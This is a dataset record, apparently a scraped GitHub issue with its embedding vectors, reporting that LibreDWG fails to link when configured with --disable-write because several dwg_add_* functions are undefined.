0.007126284297555685, -0.008885461837053299, -0.022829905152320862, -0.02139676734805107, -0.006033515557646751, -0.0010452958522364497, 0.004281503148376942, -0.0025276991073042154, -0.027731241658329964, 0.009422889910638332, -0.015879180282354355, -0.015836186707019806, -0.0006390904309228063, 0.022700922563672066, 0.0019186149584129453, 0.017656274139881134, -0.004091612063348293, -0.005230957642197609, -0.006621102336794138, 0.013177713379263878, -0.001219063880853355, -0.006402548868209124, -0.04328079894185066, -0.007255266420543194, 0.0005266786320134997, -0.006689176429063082, -0.015305925160646439, -0.03350679203867912, -0.01180906593799591, 0.01901775598526001, -0.002271525328978896, 0.002903898013755679, 0.006850404664874077, -0.004145354963839054, -0.011615592055022717, 0.004632622003555298, -0.018387174233794212, 0.013328193686902523, -0.0102254468947649, 0.014789995737373829, 0.023589469492435455, -0.010318601503968239, 0.022213656455278397, 0.0023413910530507565, 0.004732941742986441, -0.004274337086826563, 0.0024506677873432636, -0.01714034378528595, 0.009193587116897106, 0.010268441401422024, -0.01857348158955574, 0.013127554208040237, -0.040873125195503235, -0.005481756757944822, -0.01422390528023243, -0.00602634996175766, -0.024621330201625824, -0.0026925101410597563, -0.01321354229003191, -0.011694414541125298, -0.008648994378745556, 0.027645252645015717, -0.003627633210271597, -0.02311653271317482, 0.01822952926158905, 0.00051861722022295, 0.008498515002429485, 0.0052560376934707165, -0.0033786254934966564, 0.0012647452531382442, -0.027157984673976898, 0.00429941713809967, 0.01281942892819643, -0.00111426564399153, -0.02252894639968872, -0.008333703503012657, 0.0039590466767549515, 0.011794734746217728, -0.024635661393404007, 0.0041346061043441296, 0.017498627305030823, -0.011106828227639198, 0.011257307603955269, 0.03557051345705986, 0.01853048801422119, -0.016911040991544724, 0.002293022582307458, -0.020952492952346802, 0.021468423306941986, 0.007860767655074596, 0.011214313097298145, 0.006520782597362995, 0.003004217753186822, -0.011156987398862839, 0.015578221529722214, 0.011443615891039371, -0.005481756757944822, -0.030439874157309532, -0.00916492473334074, -0.015291593968868256, 0.023059207946062088, -0.014675344340503216, 0.004715027753263712, 0.003548810724169016, 0.006441960111260414, 0.00018485254258848727, -0.009408557787537575, -0.005603573750704527, 0.010848863050341606, -0.0018809949979186058, 0.0176849365234375, 0.008032744750380516, 0.0037404929753392935, 0.004761604592204094, -0.009365564212203026, 0.01069121714681387, 0.0465196929872036, -0.0181865356862545, 0.0031815688125789165, -0.010612394660711288, -0.0013068437110632658, 0.014202408492565155, -0.005990521516650915, -0.001648109988309443, -0.008871130645275116, 0.004668450448662043, 0.016223134472966194, -0.006836073473095894, -0.020723192021250725, -0.0035022336523979902, -0.007918093353509903, -0.008785142563283443, 0.0005172736127860844, -0.005259620491415262, -0.03582847863435745, 0.0035828477703034878, 0.010848863050341606, 0.007989750243723392, 0.018602145835757256, 0.011945214122533798, 0.004138188902288675, 0.00563223659992218, 0.0036419646348804235, 0.014137917198240757, 0.00445706257596612, -0.029751967638731003, -0.000548623560462147, -0.0132851991802454, -0.00013099786883685738, -0.0005826606065966189, 0.014259734191000462, 0.02252894639968872, -0.0007259745034389198, -0.0006417775875888765, -0.011414952576160431, -0.005105557851493359, 0.024191386997699738, 0.001577348681166768, -0.004435565322637558, -0.01291974913328886, -0.014431710354983807, 0.015205605886876583, -0.0054781739600002766, 0.008677656762301922, 0.010268441401422024, 0.02949400246143341, 0.007366335019469261, -0.016366448253393173, -0.0011653212131932378, -0.0004115796182304621, -0.006560194306075573, 0.02029324881732464, 0.00012316039646975696, 0.00019504126976244152, -0.01094201672822237, 0.0038945553824305534, -0.00819755531847477, -0.01976298727095127, 0.007860767655074596, 0.014173745177686214, -0.024234382435679436, 0.020522551611065865, 0.012812263332307339, 0.024320369586348534, 0.012941245920956135, 0.009996145032346249, -0.018387174233794212, -0.013722307048738003, 0.0035219392739236355, 0.003192317206412554, 0.009523209184408188, -0.0039053040090948343, 0.015678541734814644, -0.00094945466844365, -0.005782715976238251, -0.0058507900685071945, -0.004614708013832569, 0.0005848999135196209, 0.008720651268959045, -0.011680083349347115, -0.006438377313315868, -0.012396653182804585, -0.012590127065777779, -0.020121272653341293, 0.0010856027947738767, 0.016065489500761032, 0.02139676734805107, 0.015119616873562336, -0.013407016173005104, -0.02523757889866829, -0.010110796429216862, -0.004575296305119991, 0.0204508937895298, 0.011780403554439545, 0.0005329485866241157, -0.0021568743977695704, 0.01665307581424713, 0.026054468005895615, -0.011500940658152103, -0.008971450850367546, -0.029923943802714348, 0.0006426732870750129, -0.01087035983800888, -0.02247162163257599, -0.008441189303994179, 0.007989750243723392, 0.007158529479056597, 0.01566421054303646, -0.00653153145685792, -0.009645026177167892, -0.008340869098901749, -0.0008907855371944606, -0.004546633921563625, 0.01738397777080536, -0.0013713350053876638, 0.010784371756017208, 0.004048618022352457, -0.008161727339029312, 0.011708746664226055, -0.03204498812556267, -0.005825710482895374, -0.0010130502050742507, 0.020565545186400414, 0.011737409047782421, 0.020780516788363457, 0.03264690935611725, -0.004310165997594595, -0.02796054258942604, 0.013349690474569798, -0.01447470486164093, 0.014718337915837765, 0.004732941742986441, -0.009501712396740913, 0.013557495549321175, -0.003930383827537298, 0.02321685291826725, 0.005216626450419426, 0.030439874157309532, 0.019146738573908806, -0.007932424545288086, -0.004399736877530813, -0.004127440508455038, -0.014137917198240757, -0.02725830487906933, 0.014345722272992134, -0.01699703000485897, 0.013578992336988449, 0.028476472944021225, 0.012977073900401592, 0.00465411925688386, -0.008699154481291771, 0.019834645092487335, 0.01010363083332777, 0.007287512067705393, 0.015965169295668602, -0.0008424170664511621, 0.0035774733405560255, 0.01663874462246895, 0.01996362768113613, 0.018860111013054848, -0.001686625531874597, -0.010963513515889645, 0.01252563577145338, 0.005646567791700363, 0.014890315011143684, 0.004471393767744303, -0.003733327379450202, -0.020780516788363457, -0.022414295002818108, 0.009508877992630005, 0.019820313900709152, -0.0019526520045474172, 0.014818658120930195, 0.005832876078784466, 0.01724066399037838, 0.015535227954387665, -0.015549559146165848, 0.02830449678003788, -0.0165527556091547, -0.004672033246606588, -0.004127440508455038, -0.013055897317826748, -0.021167464554309845, -0.023030545562505722, -0.0017994852969422936, 0.007194358389824629, 0.01003197394311428, 0.0022464455105364323, 0.011988208629190922, 0.004689947701990604, 0.0005992312799207866, -0.011006508022546768, -0.002980929333716631, -0.012633120641112328, 0.0454305075109005, -0.008391029201447964, -0.004045035224407911, -0.043538764119148254, -0.010913354344666004, 0.0024076737463474274 ]
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
I tested on smoke/preR13 and work/preR13 branches ``` $ make distclean $ ./configure --disable-write $ make ``` Error: ``` ... CCLD dwgread /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_LAYER' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_STYLE' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_APPID' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_LTYPE' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_VIEW' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_DIMSTYLE' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_VPORT' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_BLOCK_HEADER' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_Document' collect2: error: ld returned 1 exit status ... ```
Cannot build libredwg with --disable-write
https://api.github.com/repos/LibreDWG/libredwg/issues/498/comments
5
2022-06-24T10:49:04
2022-07-31T12:57:07Z
https://github.com/LibreDWG/libredwg/issues/498
1,283,596,621
498
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Cannot build libredwg with --disable-write Issue date: --- start body --- I tested on smoke/preR13 and work/preR13 branches ``` $ make distclean $ ./configure --disable-write $ make ``` Error: ``` ... CCLD dwgread /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_LAYER' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_STYLE' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_APPID' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_LTYPE' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_VIEW' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_DIMSTYLE' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_VPORT' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_BLOCK_HEADER' /usr/bin/ld: ../src/.libs/libredwg.so: undefined reference to `dwg_add_Document' collect2: error: ld returned 1 exit status ... ``` --- end body ---
1,088
[ -0.022078445181250572, 0.021240370348095894, -0.008105963468551636, 0.020347341895103455, 0.05319710075855255, 0.003548076143488288, 0.037672121077775955, 0.03621579334139824, -0.017173651605844498, 0.0022119663190096617, -0.0115956487134099, 0.026461161673069, -0.024647623300552368, -0.005028444807976484, -0.007412147708237171, 0.04899299144744873, -0.03500676900148392, -0.014576994813978672, -0.01966039463877678, -0.016308099031448364, 0.05418630316853523, 0.0006835113163106143, 0.025980299338698387, 0.03039049170911312, -0.006038255523890257, 0.013299275189638138, -0.019962651655077934, 0.005543654318898916, -0.020828204229474068, -0.018506325781345367, -0.0031736907549202442, 0.0022497482132166624, -0.006869460456073284, 0.02015499584376812, 0.023933200165629387, 0.006034820806235075, 0.026557333767414093, 0.053114667534828186, -0.013931265100836754, 0.05913231521844864, -0.07204689830541611, -0.051795732229948044, -0.01926196739077568, -0.010221756994724274, -0.008421958424150944, 0.029318856075406075, -0.008847865276038647, 0.02923642285168171, -0.03170942887663841, -0.0019337530247867107, -0.016747744753956795, -0.02336990460753441, -0.010929311625659466, -0.03349548950791359, 0.020141256973147392, -0.038441501557826996, -0.0008539597620256245, 0.01275658793747425, -0.019729090854525566, 0.01832772046327591, -0.034677036106586456, 0.009995064698159695, 0.018959710374474525, 0.033028364181518555, -0.02717558480799198, 0.041876230388879776, -0.03146212920546532, 0.010929311625659466, -0.04665737599134445, -0.03643561899662018, -0.025334568694233894, 0.007851793430745602, -0.010256104171276093, 0.0010003651259467006, 0.015428807586431503, -0.01964665576815605, 0.001925166230648756, 0.03808428719639778, 0.01478307880461216, 0.008682997897267342, -0.01552498061209917, 0.016569137573242188, -0.055780015885829926, 0.0008290580008178949, -0.04687719792127609, 0.025499437004327774, -0.0056638699024915695, -0.04695963114500046, -0.0274091474711895, -0.013079452328383923, 0.007439625449478626, 0.026213860139250755, 0.04959750175476074, -0.051795732229948044, -0.015057857148349285, 0.0055367848835885525, -0.043882112950086594, -0.016843916848301888, -0.015154029242694378, -0.03976043686270714, -0.005282614845782518, -0.01838267594575882, -0.0037610295694321394, 0.018368937075138092, 0.025870388373732567, 0.04245326295495033, 0.03775455430150032, -0.014315955340862274, 0.027216801419854164, 0.11227446049451828, -0.01566237024962902, -0.03943070024251938, -0.007480842061340809, 0.01303823571652174, 0.025430742651224136, 0.007171716541051865, -0.0036854655481874943, 0.0064744665287435055, 0.0006062298780307174, 0.03201168403029442, 0.012715371325612068, -0.03333062306046486, -0.014164826832711697, -0.013203103095293045, 0.0065637691877782345, 0.0014030872844159603, -0.012296333909034729, -0.014439605176448822, -0.004197240341454744, 0.02053968608379364, -0.048910558223724365, -0.0389910563826561, 0.029703546315431595, -0.02136402204632759, 0.028934165835380554, -0.01655539870262146, -0.028164787217974663, 0.03184681758284569, -0.0370950847864151, 0.001733680022880435, -0.036792829632759094, -0.055725060403347015, 0.005392526276409626, 0.0001303050812566653, -0.04720693081617355, -0.016912611201405525, 0.009672200307250023, -0.016486704349517822, 0.041216760873794556, 0.008786039426922798, -0.019138315692543983, -0.004200675059109926, 0.020567163825035095, 0.023548509925603867, 0.01816285215318203, 0.01566237024962902, -0.005389091558754444, -0.021460194140672684, 0.016569137573242188, -0.03201168403029442, -0.00979585014283657, -0.024675101041793823, 0.0019681004341691732, -0.003001954173669219, -0.017791902646422386, 0.0024558319710195065, -0.015181506983935833, 0.03000580333173275, -0.02264174073934555, 0.028054876253008842, -0.010153062641620636, -0.00841508898884058, 0.017201129347085953, -0.004042677581310272, -0.018190331757068634, -0.0024472451768815517, -0.06402336806058884, 0.05088896304368973, 0.03223150596022606, -0.011561301536858082, -0.01284589059650898, 0.014467082917690277, -0.015057857148349285, 0.001774038071744144, 0.022105922922492027, -0.011774254962801933, 0.024675101041793823, -0.006714897230267525, 0.003874375717714429, 0.007735012099146843, -0.0250872690230608, -0.004822361283004284, 0.014260999858379364, -0.011746777221560478, 0.019275706261396408, -0.0032389506231993437, -0.019358139485120773, -0.02563682571053505, -0.002284095622599125, -0.0010475927265360951, 0.0029143686406314373, 0.024290410801768303, -0.006567203905433416, 0.024675101041793823, -0.017297301441431046, 0.0049219680950045586, -0.006553465034812689, 0.04764657840132713, 0.03577614948153496, -0.06907929480075836, -0.026832111179828644, -0.00011302408529445529, -0.0070480662398040295, 0.0059901694767177105, -0.009960717521607876, 0.006907242350280285, 0.0057325647212564945, 0.04970741644501686, -0.04635511711239815, -0.027725141495466232, 0.020553424954414368, -0.0376446433365345, -0.032643675804138184, 0.01552498061209917, -0.06935407221317291, 0.03157204017043114, -0.020168734714388847, -0.019220750778913498, 0.001923448871821165, 0.00930124893784523, 0.0567142628133297, -0.006213427055627108, 0.008483783341944218, 0.0034931206610053778, 0.02907155640423298, 0.032451331615448, 0.0025777649134397507, -0.004441106226295233, -0.028521999716758728, 0.007803706917911768, 0.01655539870262146, 0.025719258934259415, -0.041876230388879776, -0.03006075881421566, 0.00827769935131073, 0.019784046337008476, 0.024015633389353752, 0.003520598402246833, 0.001849602209404111, -0.02540326490998268, 0.01825902611017227, 0.03605092689394951, 0.0354464165866375, -0.007364061661064625, -0.004482322838157415, 0.0024661363568156958, 0.017585817724466324, 0.0004915957688353956, -0.032698631286621094, -0.037012651562690735, 0.023218775168061256, 0.038441501557826996, -0.029813457280397415, 0.01538759097456932, -0.03539146110415459, -0.003778203157708049, -0.030940048396587372, 0.00799605157226324, 0.013986221514642239, -0.0244140625, -0.00403924286365509, -0.05215294286608696, -0.03561128303408623, 0.009507332928478718, -0.018588759005069733, -0.03154456242918968, -0.016953827813267708, -0.003644248703494668, 0.02540326490998268, -0.014508300460875034, -0.029978325590491295, -0.0001672284270171076, -0.003922461997717619, 0.022957736626267433, 0.028494521975517273, 0.007741881534457207, -0.04096946120262146, -0.016651572659611702, -0.011705560609698296, -0.006945024244487286, 0.009926370345056057, 0.0008290580008178949, -0.019330661743879318, -0.007913618348538876, 0.024455279111862183, 0.007261019665747881, 0.012337550520896912, -0.04687719792127609, 0.03797437623143196, 0.019907696172595024, -0.03561128303408623, -0.0008303460199385881, 0.03978791460394859, -0.03050040453672409, -0.01838267594575882, 0.004760535899549723, 0.02147393301129341, 0.018849799409508705, -0.005880258046090603, 0.0027855662629008293, 0.02119915373623371, -0.016514182090759277, -0.001706202165223658, 0.009445508010685444, -0.005866519175469875, 0.02269669622182846, 0.014068654738366604, -0.007171716541051865, -0.011643734760582447, 0.019069621339440346, -0.028164787217974663, 0.012852760031819344, -0.055450282990932465, -0.03366035595536232, 0.037397343665361404, -0.03530902415513992, -0.008270829916000366, 0.008373872376978397, -0.028879210352897644, -0.044156890362501144, -0.008820386603474617, 0.01445334404706955, 0.007412147708237171, -0.03830410912632942, -0.009005862288177013, -0.08902820199728012, -0.02912651188671589, -0.016129491850733757, -0.0005164975300431252, -0.033248186111450195, -0.014329694211483002, 0.013972482644021511, 0.03272610902786255, -0.007625101134181023, 0.00996758695691824, -0.03833158686757088, 0.007858662866055965, 0.02669472247362137, 0.012028425000607967, 0.04080459475517273, 0.0008342100773006678, 0.028027398511767387, 0.017640773206949234, -0.027862530201673508, -0.020841943100094795, -0.03431982547044754, 0.006965632550418377, -0.02790374681353569, -0.01617071032524109, -0.03148960694670677, 0.0004851556441280991, -0.051301129162311554, 0.024482756853103638, -0.0032389506231993437, -0.02552691474556923, 0.010730097070336342, 0.03239637613296509, -0.009163860231637955, -0.024647623300552368, 0.009005862288177013, -0.02280660904943943, 0.004238456953316927, 0.004451410379260778, -0.020580902695655823, -0.013003888539969921, -0.028329653665423393, 0.030967526137828827, 0.005268875975161791, -0.00007797910802764818, 0.0006847993354313076, -0.03322070837020874, 0.018520064651966095, 0.02806861512362957, -0.019055882468819618, 0.00022304279264062643, 0.01710495539009571, -0.004781144205480814, 0.037617165595293045, 0.0024987661745399237, -0.041601452976465225, -0.044871315360069275, -0.019674133509397507, -0.0016237687086686492, -0.05097139626741409, -0.029153989627957344, 0.036737874150276184, 0.020292386412620544, -0.019303184002637863, 0.040887027978897095, 0.008257091045379639, -0.01644548773765564, -0.013945003971457481, -0.0016855938592925668, 0.011492607183754444, -0.0029349769465625286, 0.005100574344396591, -0.006041690241545439, -0.0335504449903965, 0.007769359741359949, -0.012990149669349194, 0.03431982547044754, -0.005845910869538784, -0.01599210314452648, -0.004228152800351381, 0.01081939972937107, 0.0430852547287941, -0.005371917970478535, 0.002057403326034546, -0.03011571429669857, 0.027986181899905205, 0.01986647956073284, -0.02015499584376812, -0.008119702339172363, 0.018671192228794098, 0.02967606857419014, 0.01981152407824993, -0.02147393301129341, 0.02485370822250843, 0.005454351659864187, -0.029099034145474434, 0.005255137104541063, 0.017970507964491844, 0.028384609147906303, 0.020333603024482727, -0.012948933057487011, 0.011066700331866741, -0.033742789179086685, -0.005512741860002279, -0.02280660904943943, 0.013670225627720356, 0.008682997897267342, -0.014631950296461582, -0.04206857457756996, -0.05360926687717438, 0.02519717998802662, -0.018945971503853798, -0.04624520614743233, -0.021954795345664024, 0.00871734507381916, -0.011437651701271534, 0.00555052375420928, 0.02180366776883602, -0.027560275048017502, -0.0034862509928643703, 0.037287428975105286, -0.01600584201514721, 0.0115956487134099, 0.002744349418208003, 0.01235128939151764, -0.031132394447922707, 0.0008509543840773404, -0.030967526137828827, -0.00318399490788579, -0.011863557621836662, -0.030940048396587372, 0.04357985779643059, 0.015002901665866375, -0.009713416919112206, 0.010723227635025978, -0.01721486821770668, -0.020470991730690002, 0.026942024007439613, 0.0400901697576046, 0.021240370348095894, -0.036957696080207825, 0.050641659647226334, -0.03267115354537964, -0.04849838837981224, -0.00744649488478899, -0.014851773157715797, -0.023795809596776962, -0.026832111179828644, 0.010702619329094887, -0.0381941981613636, -0.004083894193172455, 0.01838267594575882, 0.016321837902069092, 0.030857615172863007, -0.03228646516799927, 0.03179186210036278, 0.01860249787569046, 0.034731991589069366, 0.0014443040126934648, -0.03632570430636406, 0.008215874433517456, 0.03099500574171543, 0.01926196739077568, -0.013182493858039379, 0.04245326295495033, -0.008545608259737492, 0.013017627410590649, 0.019564222544431686, -0.003589292988181114, 0.002612112322822213, 0.03736986219882965, -0.023328687995672226, -0.03256124258041382, -0.006787026766687632, -0.016459226608276367, 0.01794303022325039, 0.020773248746991158, -0.05116374045610428, -0.038441501557826996, -0.0340999998152256, -0.009919500909745693, -0.023053908720612526, 0.007003414910286665, 0.00855934713035822, -0.00015306015848182142, -0.004684972111135721, 0.0033179493620991707, -0.03808428719639778, -0.010118715465068817, 0.018684931099414825, -0.0135671840980649, -0.015648631379008293, 0.020237430930137634, -0.00532726664096117, 0.006491640117019415, -0.0015567914815619588, 0.01358779240399599, -0.0013687399914488196, 0.018341459333896637, 0.03066527098417282, 0.0025863517075777054, 0.01508533488959074, -0.010015673004090786, 0.001453749486245215, -0.002138119423761964, -0.003620205679908395, -0.020677074790000916, 0.032149072736501694, -0.04327759891748428, 0.03431982547044754, 0.006701158359646797, -0.01765451207756996, -0.03066527098417282, 0.011932252906262875, -0.017297301441431046, 0.00974089466035366, -0.04058477282524109, -0.01926196739077568, -0.006622159853577614, -0.002541700378060341, 0.0010055172024294734, 0.0017517124069854617, 0.016088275238871574, -0.0030912570655345917, 0.022078445181250572, -0.025925343856215477, 0.011320870369672775, -0.015511241741478443, 0.026818372309207916, -0.028934165835380554, 0.0004422214988153428, -0.014357171952724457, 0.02707941271364689, -0.0013335340190678835, -0.027670186012983322, -0.030967526137828827, 0.017146172001957893, 0.010929311625659466, 0.03932078927755356, -0.014618211425840855, -0.027972443029284477, 0.007315975148230791, 0.008394480682909489, 0.018190331757068634, -0.00564669631421566, -0.016967566683888435, 0.03816672042012215, -0.025114746764302254, -0.028192264959216118, 0.0001718438434181735, 0.008655520156025887, -0.023108864203095436, 0.0010536034824326634, -0.001904557808302343, 0.021776190027594566, 0.007329714018851519, 0.0068213739432394505, 0.02192731760442257, 0.01606079749763012, -0.01090183388441801, 0.05819806829094887, -0.004489192273467779, -0.03442973643541336, 0.011671213433146477, 0.024661362171173096, -0.01212459709495306, -0.01358779240399599, 0.020003868266940117, 0.009459246881306171, -0.021680016070604324, -0.026887066662311554, -0.0010664836736395955, 0.015634892508387566, -0.015167768113315105, 0.00003198592457920313, -0.0030603446066379547, 0.01838267594575882, -0.0032183420844376087, 0.01765451207756996, -0.004399889148771763, 0.025155963376164436, -0.012955802492797375, -0.003161669010296464, 0.022737912833690643, -0.018341459333896637, 0.026062732562422752, -0.002258335007354617, -0.014096132479608059, 0.0013550010044127703, -0.010386624373495579, 0.01821780949831009, 0.04860829934477806, -0.004612842574715614, -0.0016993327299132943, -0.014315955340862274, -0.01434343308210373, -0.019220750778913498, -0.013498489744961262, -0.0011360369389876723, 0.015689847990870476, -0.004334629513323307, 0.027560275048017502, 0.040557295083999634, 0.0031393433455377817, -0.03126978501677513, 0.002029925584793091, -0.01582723669707775, 0.00667024590075016, -0.01508533488959074, 0.007776229176670313, -0.03583110496401787, 0.004049547016620636, 0.0009840502170845866, -0.0014185435138642788, 0.018423892557621002, 0.013629009015858173, -0.011980338953435421, -0.01085374690592289, 0.013993090949952602, 0.020896898582577705, 0.02547195926308632, -0.02152888849377632, -0.00039091522921808064, 0.06039629504084587, -0.014425866305828094, 0.02790374681353569, -0.023328687995672226, 0.005255137104541063, -0.027807574719190598, -0.00420754449442029, 0.015799758955836296, 0.03022562526166439, -0.003422708483412862, 0.00014425866538658738, 0.016514182090759277, 0.02863191068172455, 0.01639053225517273, -0.03006075881421566, 0.004564756527543068, -0.02108924277126789, -0.002521091839298606, -0.012447462417185307, 0.014233522117137909, 0.026158904656767845, -0.01472812332212925, 0.045201048254966736, -0.008147180080413818, 0.01938561722636223, 0.03915592283010483, 0.01770946942269802, -0.055560193955898285, 0.006550030317157507, -0.036957696080207825, -0.016692789271473885, -0.02015499584376812, -0.015360113233327866, -0.0015731063904240727, -0.016472965478897095, -0.010036281310021877, 0.005667304620146751, -0.029978325590491295, -0.0018032332882285118, 0.0291814673691988, 0.009514202363789082, -0.0008058735402300954, 0.01942683383822441, -0.015593674965202808, -0.00010610096069285646, -0.016019580885767937, 0.0005027586012147367, 0.00025245267897844315, -0.012220770120620728, -0.008112832903862, -0.01788807474076748, -0.006014212500303984, 0.009706547483801842, -0.01865745335817337, 0.01099113654345274, 0.0028096092864871025, -0.0033248187974095345, 0.01392439566552639, 0.007872401736676693, -0.0030586272478103638, 0.022215833887457848, -0.015415068715810776, -0.0268595889210701, -0.04434923455119133, -0.009651592001318932, -0.019069621339440346, -0.0002706996747292578, 0.013299275189638138, -0.007192324846982956, -0.03558380529284477, 0.0010570382000878453, 0.016418009996414185, 0.011162873357534409, 0.0015396177768707275, 0.005004401784390211, 0.027546536177396774, 0.010730097070336342, -0.03698517382144928, -0.019962651655077934, -0.00006552821287186816, -0.009919500909745693, 0.023630943149328232, -0.034731991589069366, 0.009617244824767113, 0.01971535012125969, -0.013223711401224136, -0.010812530294060707, 0.0006225448451004922, 0.019000926986336708, 0.004276238847523928, 0.005725695285946131, -0.051960598677396774, 0.007130499929189682, -0.01439838856458664, -0.0015851280186325312, -0.008813517168164253, -0.016569137573242188, 0.006543160881847143, 0.006945024244487286, 0.01743469014763832, -0.02475753426551819, -0.0058218673802912235, -0.043442465364933014, -0.014247260987758636, -0.012516156770288944, -0.006642768159508705, -0.01744842901825905, 0.033303145319223404, -0.007577014621347189, 0.015497502870857716, -0.024661362171173096, 0.019564222544431686, -0.000558572995942086, 0.012145205400884151, 0.006072602700442076, 0.010208018124103546, -0.010908703319728374, -0.0033643182832747698, -0.02192731760442257, -0.03506172448396683, 0.011286523193120956, -0.009802719578146935, 0.006951893679797649, -0.017805641517043114, 0.004300282336771488, -0.004588799551129341, 0.017242345958948135, 0.027835052460432053, 0.0015868453774601221, -0.002696263138204813, -0.007192324846982956, 0.02220209501683712, -0.02137776091694832, -0.008971515111625195, -0.024180499836802483, 0.06462788581848145, -0.028329653665423393, 0.03569371625781059, -0.019275706261396408, 0.006673680618405342, 0.016624093055725098, -0.007412147708237171, -0.016459226608276367, 0.012694763019680977, -0.006460727192461491, -0.007419017143547535, -0.023397382348775864, -0.026433683931827545, -0.03333062306046486, -0.045970428735017776, 0.0001406092633260414, -0.015648631379008293, -0.013258058577775955, 0.01439838856458664, 0.004437671508640051, -0.0009016166441142559, 0.025554392486810684, -0.009940109215676785, -0.018588759005069733, -0.0020814465824514627, -0.009747764095664024, -0.007267889101058245, 0.0654522180557251, -0.029208945110440254, -0.001775755430571735, 0.019014665856957436, 0.004097633063793182, -0.021734971553087234, -0.03333062306046486, 0.0035017074551433325, 0.002409463282674551, 0.013642747886478901, 0.0066324640065431595, -0.002720306161791086, -0.01171243004500866, 0.007872401736676693, -0.007577014621347189, -0.013629009015858173, 0.02192731760442257, 0.023768331855535507, 0.008051007054746151, -0.01584097556769848, 0.01007749792188406, -0.013244319707155228, -0.018286503851413727, -0.028521999716758728, -0.04231587424874306, -0.03470451384782791, 0.006196253001689911, -0.0028662823606282473, -0.005547089036554098, 0.0021415541414171457, 0.019852740690112114, 0.03671039640903473, 0.02762896940112114, -0.016569137573242188, 0.006003908347338438, -0.024276671931147575, -0.0017474190099164844, 0.002182770986109972, 0.015621152706444263, -0.006491640117019415, -0.01503037940710783, 0.008820386603474617, -0.017256084829568863, -0.0012407962931320071, 0.012035294435918331, -0.01766825094819069, -0.0000031093700272322167, 0.02286156453192234, -0.020361080765724182, 0.0032269288785755634, 0.005660435184836388, -0.006797330919653177, -0.008401350118219852, 0.014151087962090969, -0.033797744661569595, -0.007824315689504147, -0.01464568916708231, -0.008504391647875309, -0.03978791460394859, 0.01615697145462036, 0.008950906805694103, -0.013168754987418652, -0.002562308683991432, -0.02723054029047489, -0.018245287239551544, -0.005392526276409626, -0.01661035418510437, -0.011568170972168446, -0.026419945061206818, -0.0019663830753415823, 0.008545608259737492, 0.013100060634315014, 0.01472812332212925, -0.019839001819491386, -0.03517163544893265, 0.00866238959133625, 0.014576994813978672, -0.002361377002671361, -0.016308099031448364, 0.00023849908029660583, 0.016857655718922615, -0.021061765030026436, -0.0015842692228034139, 0.016706528142094612, 0.008799778297543526, 0.004049547016620636, -0.005207051057368517, 0.008009790442883968, 0.025568131357431412, 0.014082393608987331, -0.0026052428875118494, 0.026667244732379913, -0.026461161673069, 0.009445508010685444, -0.013381708413362503, 0.0074602337554097176, 0.027106890454888344, 0.009466116316616535, 0.011156003922224045, 0.02940128929913044, 0.029703546315431595, -0.004186936188489199, -0.014714383520185947, -0.017956769093871117, 0.01787433587014675, -0.016253143548965454, -0.015868453308939934, -0.00589399691671133, 0.020580902695655823, 0.03371531143784523, 0.02170749381184578, 0.024427801370620728, 0.0015782584669068456, 0.033907655626535416, 0.015758542343974113, 0.029538679867982864, -0.0115200849249959, -0.009150121361017227, -0.051795732229948044, -0.04264561086893082, -0.03539146110415459, -0.020196212455630302, -0.0035824235528707504, 0.006398902274668217, -0.03258872032165527, 0.0030964091420173645, 0.022298268973827362, 0.011684952303767204, 0.012955802492797375, -0.04467897117137909, -0.025884127244353294, -0.006440118886530399, 0.0022737914696335793, -0.01948178932070732, -0.002541700378060341, -0.010379754938185215, 0.00885473471134901, -0.019468050450086594, -0.02485370822250843, 0.006072602700442076, 0.006745810154825449, -0.014247260987758636, 0.007020588498562574, -0.029648590832948685, -0.007604492362588644, -0.0035789888352155685, 0.04261813312768936, -0.0274091474711895, -0.026035254821181297, -0.004008329939097166, -0.019083360210061073, -0.004296847619116306, 0.010661402717232704, 0.03442973643541336, -0.0024317889474332333, -0.011004875414073467, -0.006773287896066904, -0.022930258885025978, 0.0015739650698378682, 0.014109871350228786, 0.0036133360117673874, -0.014549517072737217, -0.0028388043865561485, -0.02402937225997448, -0.006704593077301979, -0.010125584900379181, -0.02512848563492298, 0.013498489744961262, 0.010256104171276093, -0.00042762389057315886, -0.023878244683146477, -0.03022562526166439, 0.013065713457763195, 0.030253103002905846, -0.005217355210334063, 0.012935194186866283, 0.0037850725930184126, 0.014178565703332424, 0.013409186154603958, -0.029703546315431595, 0.01372518204152584, -0.027944965288043022, -0.02320503629744053, -0.016843916848301888, -0.003259558929130435, -0.03151708468794823, 0.0005735999438911676, -0.001051027444191277, 0.031297262758016586, -0.0357486717402935, 0.012303203344345093, -0.0028096092864871025, 0.0056054797023534775, 0.023053908720612526, -0.009823327884078026, -0.006567203905433416, -0.027546536177396774, -0.003460490610450506, 0.004362107254564762, 0.009129513055086136, 0.0038434630259871483, -0.015552458353340626, -0.005869953893125057, -0.01187729649245739, -0.012365028262138367, 0.01960543915629387, 0.0028817385900765657, 0.01070948876440525, 0.008586825802922249, 0.026392467319965363, -0.004214413929730654, 0.012825282290577888, -0.005691347643733025, 0.009005862288177013, 0.006453857757151127, -0.00797544326633215, -0.03769959881901741, -0.0035583805292844772, -0.025059791281819344, -0.027258018031716347, 0.014673166908323765, 0.010125584900379181, 0.008957776241004467, -0.021886100992560387, 0.023452337831258774, -0.019014665856957436, 